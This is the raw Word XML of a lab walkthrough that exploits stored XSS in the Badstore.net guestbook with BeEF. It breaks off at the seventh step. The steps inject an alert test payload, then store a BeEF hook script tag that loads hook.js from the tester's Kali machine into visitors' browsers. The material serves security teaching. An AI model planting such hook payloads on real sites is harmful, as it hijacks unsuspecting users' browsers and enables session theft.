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w:rsidR="00113297" w:rsidRDefault="00441EC8" w14:paraId="1B7C0D35" w14:textId="7169632E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Stored XSS in Badstore.net</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="01136A19" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526DCC" w:rsidRDefault="00526DCC" w14:paraId="7670A9CA" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00526DCC" w:rsidRDefault="00526DCC" w14:paraId="29642208" w14:textId="60A01613" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stored Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability commonly found in web applications. It occurs when an attacker is able to inject malicious scripts into a web page that is subsequently stored on the server and displayed to other users. This can happen in places where user input is accepted and stored, such as comment sections, forums, or user profiles. When other users visit the infected page, the malicious script executes in their browser, potentially allowing the attacker to steal cookies, session tokens, or other sensitive information, manipulate the content of the website, or perform actions on behalf of the user without their knowledg</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007854DA" w:rsidRDefault="007854DA" w14:paraId="40264D6E" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidP="4FECA3D6" w:rsidRDefault="00113297" w14:paraId="232373A9" w14:textId="392B42BF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which stands for The Browser Exploitation Framework, is a specialized tool for penetration testing that focuses on assessing the security of web browsers. With the rise in web-based attacks targeting clients, including mobile devices, </w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows professional penetration testers to evaluate the actual security posture of a target environment using client-side attack vectors. Unlike other security frameworks that concentrate on fortified network perimeters and client systems, </w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> emphasizes the exploration of vulnerabilities within web browsers. By hooking into one or more browsers, </w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a platform for launching targeted command modules and </w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>additional</w:t>
      </w:r>
      <w:r w:rsidRPr="4FECA3D6" w:rsidR="4FECA3D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks directly from within the browser context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4FECA3D6" w:rsidP="4FECA3D6" w:rsidRDefault="4FECA3D6" w14:paraId="5A9708C6" w14:textId="1D188DDA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="2218E52D" w14:textId="585C9167" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In this we will be exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore.net</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is prone to </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stored XSS (Cross-Site Scripting)</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Badstore.net is a dedicated site to help you understand how </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hackers’</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> prey on Web application vulnerabilities, and to show you how to reduce your exposure. We will be using BeEF to show common hacking techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="301CAD77" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="573777F5" w14:textId="7E34507B">
      <w:r>
        <w:t>Here are the steps to perform:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="0601E805" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="122EBE84" w14:textId="48F51BB2">
      <w:r>
        <w:t xml:space="preserve">Step 1: Open Badstore.net </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="264F985C" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="5694C30F" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2B4A4A21" wp14:editId="5C0A939A">
            <wp:extent cx="3910013" cy="323328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3910013" cy="3233280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="240BF4C9" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidP="7E815BD3" w:rsidRDefault="00000000" w14:paraId="79BA90CB" w14:textId="177D9CCD" w14:noSpellErr="1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Click on “Sign Our Guestbook”. Now in the input field write basic script in the format of </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="0551AA6B" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1CCD5CF4" wp14:editId="0D73C699">
            <wp:extent cx="3318510" cy="2871788"/>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3318510" cy="2871788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="2903894A" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="07B69B20" w14:textId="77777777">
      <w:r>
        <w:t>Step 3. Click on Add Entry. We get a dialog box alerting name, email and comments which means all input fields are vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="0369D9CB" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D9699C6" wp14:editId="059611A2">
            <wp:extent cx="3024188" cy="1060587"/>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3024188" cy="1060587"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="692F1904" wp14:editId="4EDF8BE3">
            <wp:extent cx="3005138" cy="88281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005138" cy="882815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="0ED4F8F2" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="710670B5" wp14:editId="1F1EC984">
            <wp:extent cx="3043238" cy="1065439"/>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3043238" cy="1065439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="1B5F183C" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="2A3171BE" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="45E5457D" w14:textId="77777777" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4. Now we can execute the </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF-xss</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script. First </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open up</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the kali terminal and write </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“beef-</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">command. You will notice two links - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="07A7A07C" w14:textId="6C6FC8F7" w14:noSpellErr="1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UI:</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> interactive panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="0023679A" w14:paraId="44C460E1" w14:noSpellErr="1" w14:textId="6AA59951">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hook: the script we </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute on the website and then store it in the website’s server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="3CC57B8B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7B2586DF" wp14:editId="69B40282">
            <wp:extent cx="4288903" cy="3148013"/>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288903" cy="3148013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="7F215B3C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="3DB60189" w14:textId="29D5128D" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5 :</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute this hook script in any of the </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> our guestbook’s input field. Make sure to change the </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> address to the current kali </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine’s </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> address. Now click on add Entry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="0A65BE9D" w14:textId="77777777">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This will store our hook script on the BadStore.net server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="7C4E3857" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidP="7E815BD3" w:rsidRDefault="00000000" w14:paraId="5FD4615B" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="http://192.168.118.128:3000/hook.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="71A7D4B8" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="4E988FED" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="39D12BD7" wp14:editId="288B9F30">
            <wp:extent cx="3767138" cy="3278134"/>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767138" cy="3278134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="4DD66551" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="34F9B5AF" w14:textId="77777777" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6. Open the web UI panel. Make sure to change the </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> address to kali’s </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="6ABBCB92" w14:textId="77777777" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now login using username as </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">“beef” </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and password as the </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pass phrase </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which you entered when you ran beef-</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command for the very first time. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="417D8771" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="07C1C702" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://192.168.118.128:3000/ui/panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="2FFC39BF" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="7A4019B1" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0F66C43D" wp14:editId="74831CCB">
            <wp:extent cx="3862388" cy="3175328"/>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862388" cy="3175328"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="08269C2E" w14:textId="77777777">
      <w:r>
        <w:t>Step 7. Now pretend you are a normal user(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:t>) who is surfing this website in the windows machine or different virtual machine. Now go to sign our guestbook and write something about this site and click on that Add Entry button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="4C42545F" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="64F48045" wp14:editId="12E9BFE5">
            <wp:extent cx="4576763" cy="337389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576763" cy="3373895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
